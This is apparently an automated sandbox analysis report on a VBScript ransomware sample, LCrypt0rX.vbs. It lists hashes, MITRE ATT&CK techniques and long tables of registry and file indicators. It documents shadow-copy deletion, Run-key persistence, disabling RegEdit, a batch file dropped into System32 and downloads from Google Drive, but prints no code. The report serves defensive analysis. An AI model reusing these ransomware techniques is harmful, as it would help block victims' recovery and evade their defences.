becd2c45fe7bf8eedc702223d6be3484b2c2bc38277ecba16c74e18ab2572846

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
19-10-2024 07:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LCRYPT0R/LCrypt0rX.vbs
Size

12KB
MD5

a3932d2bfc2b9d66ba5da7cd39f7cd84
SHA1

a508af3ec896559b5cc102917e3345996792726b
SHA256

63498826e04670e88ea0ddaf76e27b0f6afedb778e298147c29676dee3ce92fd
SHA512

95dfb60f4d6b16cefa4c3a20e47c94034a17a0b44479527679ca3ae514e5dda08defd49bb6c13d85f12c1820bfc681409a7eacb29ed33c59df293d8e57db251a
SSDEEP

384:BobplStxYHQHSH7l+ii3qF2ZNvLyyB8dstnH+7Me:EM22M

Score

9^/10

defense_evasion discovery evasion execution impact persistence ransomware

Malware Config

Signatures

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	804	wscript.exe
5	804	wscript.exe

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	wscript.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MyStartupScript = "C:\\Users\\Admin\\AppData\\Local\\Temp\\LCRYPT0R\\LCrypt0rX.vbs"	wscript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	drive.google.com
5	drive.google.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\iamthedoom.bat	wscript.exe
File opened for modification	C:\Windows\System32\iamthedoom.bat	wscript.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\gcrybground.png"	wscript.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 32 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Interacts with shadow copies 3 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
3000	vssadmin.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
1080	taskkill.exe

Modifies Control Panel 1 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Control Panel\Desktop	wscript.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = f0b2dbf3f721db01	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 64 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff4b00000000000000d104000065020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000036cbefc36dc52c4c8045fefa490aeb0a00000000020000000000106600000001000020000000bd85628cb3a1f53560379a92213b92ac2a96bc107485a15baadee2158e7d942e000000000e800000000200002000000067120c703f6b065c2dc3ff2a5d17120ccb3337aef60822884f7086ee21d2e59a80030000c6c579095b82314d21d1b9a952386c1bb37ec892bcb91f2a2fa6902972c36f7b7644481dd97809ca84c02257f3cdc6295d94ab39b246a05f7fbe863073c58098d0b9e49f09ff3d0b9b2d2c8a3f007799ccaa21713b85acfa8dc1c08ebd8e91f8350842121c5c243f5b34824bf117a34ee8d962a4ccb3bf326386e5fa6b4b574f2bb1aa090d4a5a49224d605d4b1050819e178b99c043dc7007293b7af928bd7599753d44c81abdbab7f1dd14973b6cfa06cb2fad6d7d8d627bde5288d74eaf8872b30fc04bff4ec04dba952b13a7042ce7678a9b820ca03edbe5ae73e16b47505060e02c9ae03777b16429421b164604fe213932669fd7b9d0ad553863d29f15501be9468ea8961bfd5b06e573b43ce1fb7490b55ca20370a4f124d707a86fd2666f7a993a0729f2cdcd1d6be089c56e552ee48d953f57be03fa19d4794a9137640a2472929b5053c18cbc0d65d262027f77b5f8ef42e04e0bb81e3fe700b3fc02ccf21a606ed94b0a7d5a3243e5a15f78e93ba0bb204a9014a7ba87f1f5bc025aaf4f89a946aa2058cd63a1ebd3a40744c4939848e2d1902fd92e6227c698bb2cdc4efb5fd799ced2528248fb6483c974b1792c69c0f95054c3e03ab719335d019c911d0c8064e5e2097fc8d39da8c346000d90819f86e50538221b231da8eef27f4ea29b1dec3d3d2af29c0f2440ed1af4d5acdf42d2c7507ffa7e3a871fc3febddc63f80458b583df37929950a3d9429309b19bccdeefd89eaa5be78ce90eb1c0b24c6f9ed18eb8058b9be012272111df20fcda679139b567aee73548b98d11d9c50ea1f19dc8d0f651ed47e2e72dc187fb76e417b76a7547c29459d887eb22e5316268a9ac4ae97c36d4769b7c688182fd8de200cb8d871b36445dae69cad1a6d9df6fd99c97226b4ae1b3c6b04a76da2969275a973a22d03478c8d47e72a48680a5e0d4d94c115d542d9884ad61205ec77260eaf0094120ad4d9a29730a21c50f9cb4c3cbf55bfc6af3277e8fcb66389881eba80658d8621cb722e3a805015342854483808abe63bea6875a539e7b78848b276d8cb01c6c6d6c2758d7b72f1f3fd000bd5ffae6bbd433f15cce2b494b131e21d0e8ac4d6cf6929fcda3277b1918155e89911fe8bcb37e8059bf6cdfb1939ff207bab79212bc9ce8d9e92098cdbcc9f12c0b277b88900b888424dc10617dbea33a0e0e906269f2f1b00b336f3a6b96c5958d75a46986f8b1c58abb2131e7b4ae48b94dd4aef2b54ddf0b2040000000a05bebdb0f25e433cd48778ea863e85331b98163311bc5a6e0975db33d3926139570fe320aa9ac81a490185c8e70842619c675eb4a3552db9098f16426c05296	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000036cbefc36dc52c4c8045fefa490aeb0a00000000020000000000106600000001000020000000aaf06f9e0eb1bdf468136d8099fd6fa3198a18b61f4d62ee41f46e795d8d7966000000000e800000000200002000000046501e1f1601136a04241978bccf74b7416d3d0d351927dadb203547f91ec0c3800300005dbc7342083b800196d936b0a9e931ba1561d973500d93ca7bd30f156034ae75a61ef8e3d51868c8550aa2dce0acef506df9b7f0380a36bd3669875453d31310f6d1403c2307e47a34d0e3bb86dfb99b9a840e4fc01c7bf6da636655886d6aec8f246a7b3bd37a2a07440c7ca79f25dee4bc5524d16ca6be0f2ff06cb99f3fb3f98eab32aa869a875afdab0fc7532740bd7a928513280427e5e42a1018d8d8a9a50434dcb779e0ca4d6dd1972e5558868d525086e2aaf3216cba83ea08f9f9a785aa246e5b145429e61f730a7dcb3bdebd825603ee5525eb6fe3e6cda2aa9a11427922c8489b35d6d4a5ede9bbbf57a0673e3a426f0eeadb6d5621cc32ec3fbe18e3920d01e4208d94db9e4554b92dc7c0639126b5d39cf330a684c54919a574d9ccdc2a2245c57333728da5a1e71ee58135d0105e4272b3161e194585f9ebc30202a24510f01f9470a04e349e2087257da8ee715ea66dd618c134af51976b5b2376319b1706a5de8c030d192d5ff3305b56c622f8bacfba11c275ff820b15d5ca2e8d43db3ac7ca146591004eef2f4b1781c9972d5f21bc90f3d8c042337ca75d4c6d4598a50dd3c8af81fd5e50b67bc12d72cb6e5f5d7bc005f8a1f3aca3a6a9fc58efa0a77d6c32d4192b49440e337d09c7367da086d52a14d3038bff7b63bc59dc304ebac90cc3d827a3565167c595390328c2998cb04f03b0548e7fbcb61c715457d1b2c66e7bed6d2e50c0c8a456f1c64b5f87e7705e79dffeb4ac2c4e7a7a96c73b4d7419039d2a0fb010eab8731f2ed9aa8892a5feea976263e82a87118e1aa9dc68f8a37586c4081bcd60420eee73ec1a02d7205b91405ef2dd0998dade97a37e0b9e14bc2388549349e50e60a37f0e412e38ede8fbb43ca225129211f7c15d77a60ffa3b5871ab89bb5c032ba19430178a759836bd49aa86c6f74e58e59285c86c7ea08cf796408be88cb27b253655a4a56c0c0d63137379bbd70f0f1e5dfe0c9f5004033a843249828c271f31bbfd83e7708e9849d3ef62e1bffc3424fa381e4468117fb5d5415073b3d1bb5aad5acaec060434f2de42bf1c06474ce74e0cdd8aba4682092f1032fd6c94fa6e54637140cfcf2ca7f4d24ea1bf0195fc3581e59ffceef51e81b24ee9b472a9ca7cc466f5ee75def20fd411d93e3a55921a2f6eceb16d3515503dddcb3c19be915dd5c3a311f5e582a64090bcf5d5b51bb28e7184a3b824b9be71662f6f3780236d14d18602fa2e8030f8ff8d263c400000007eb84149bfa565b1deddf7c17b8aa2a9f319f5aa89c4f8d4495f8015d9e9c32c1ff769f400c9b1c610f607dcfefb16d6ee81fc7b924b0b28982eb5e98c3875ae	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000036cbefc36dc52c4c8045fefa490aeb0a000000000200000000001066000000010000200000000926a4c404db19a9d50c5d8660dba58954865a1407a894f796be668eb1fbb1c2000000000e8000000002000020000000043ce23084d4bc584cc853f49aa4819d777a08696ecadd5fd7cf65b6af5267da800300000e4d144f80ed17290c2952c61254e90ea7f38b6dc8d69407e57c05c679a19c80e7bfc88472fafa7c6a2dfe2a397906c1cf0d2fc98f616a5126a7537864b1bfe6e986b99b26304d54407866473dbf1839ea8b6596da4afcd961fb9672f6f1459537b3ee20cccfb81fead09bb6fdb8e56bea83a9eee8c52640f444aa144b4ed36c6b6d3f064578b04a210b280f9077f1f5fd033a2146e76a4ce950cecfad358934b1deccb6a90a01f3eeca94ca677fdaa8de6c1a75aecfa7e73445c0f91d0ce0401e6557d4c8f3d4631b9965ba0547301a6b8800f527709840a9810861fe612a6953823a3809dda140814c6b2336daeae859bd049198f803572ea4b0d8ab5abee6199f46a58e536c68bae9f0e525fd403ae9e2e2570b2a055e5ffc3e1fa37b6bc0d2a639cf5dbb621160ed13c9d301a1ee3f16bf4f0dc885a9bdb4aa303954fa93376745bb7192ccfce81923b21beb081a84ab65eaa63c365efc9f8261aea8e8f7f47d23429698a21c68124f3f1f77c5e0e8b8d7121c26d59b17bfcff60e3286f59d019d1f17332fae14305336393bac3c5398fff751b194d0d302288773497ade091d7407dfd5fd8ca83f7164b685c11375951851b248459ce49d9c18ddc2fc05572b3b1ad61c04e8a9452b06149cccc6ce5969c4142c46d5b33dfae781a42b69c5a13f1a58578cf3f7a54b39e555bf0994412ba004a431189b4245c66cf47feaaeb2f06797b4f62521279ee6e03f496dedf727f6b18302be82e6127ffcf9d0d0928e76774d297ef3292df976fd9eb87cbaf211c8971b71de37a41f80b37ee68e60c997cdd036e3deb914bcec38643d7e9bd7b8a73b7b0990c77312fcd0333b852a70ccecc14ce65206a3a2c96de87271fe4932ecbba52939325940bdfdd7f279ff2c2f1ddd110f296561448730f96f4cc99e9d463028a446ad9f75b161d112bda109d98db4d41328f205211558883a64733724d063c6dabae4934d7964b59e7f5b6017b7f0b7bbcbf2e9d89d8792bd56fa1c890c7ac12d8380dd1ef0d5ad0b7215a38d2582fd67804947962a658d33ab2aeca6e1992b0fef1e794fa03e8adb14f90a3a1e7a59c3fd2fc8d3bd10629698f11d29817aa0154978ce7aebca82f8b5bf76304f24fe137c8b850b6bb1ff5a61bb4ee13dd12ef4384b778f20e38be85a7fbcf7a761dbd1cd74cedda703fbed4edac8aef770d4d17d3eab0e87008d141d93a505de8415e28e1066dac99436a624ee6a4ae60722bdd8ea77e7f41f99fcb6400000005072d4e2c04cf491a7b1032b793a72ec50be58e0854b4e212870592548910c059abceef26da0a4e16afa318924b0c44ca03e55d0986f0ffa5cbc65de2fbf148c	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000036cbefc36dc52c4c8045fefa490aeb0a00000000020000000000106600000001000020000000510d34dbdd221a4a9bc0a87e70cd3ecf2933070f5bf45e8dda24b15d8c9a479e000000000e8000000002000020000000d66f3f24f097c846bb411992b4c27535f7c90de6a739b6c27b7735f00698691980030000b468f2d750a8e280796ba68d96fc4217a7ab1554fe736b949cf60ed88ebcaf440322d5175348cbd2e2265cccb0fb55857fd48cb5e107bf8c8525f3604e9c26d87f921f30315ed548e71d9fe79f4560b1c1b48ee1ab4962718a5e8310e318e87feea6ca306cefe18cb9da5b9f34cdd63f90beb4cd60b13af2705172e3415c2f023afef2df216573853e7d3b1581192beb79f2782d0c571314f07f7a29df4d05d8014693816edc277b29b91fb9f487802b2006be9c020df66d6e742881e8573dc87cac715955dd4eef5a7341310076de913b3335be04297535e425652797a175084803602d178d2c7deb1922caff3981440e4714d585d3a947ff79b5a1a85f7ed11e7e5ff9dffb3da86868e3c035283ebd2ac7341e5c0602e7eae6ec8619921d52169da8e364fc3b9cb3b27a99c76b854d5f000461fb4ffb1d3c64550f240b27365a44c3897573f3cbbf2eceb87e7703e5a2719452e34e3a950dbcf21b32dc03c4f2c5a07fd8e419ad0724fde08d28c85e5c83c3c21b6a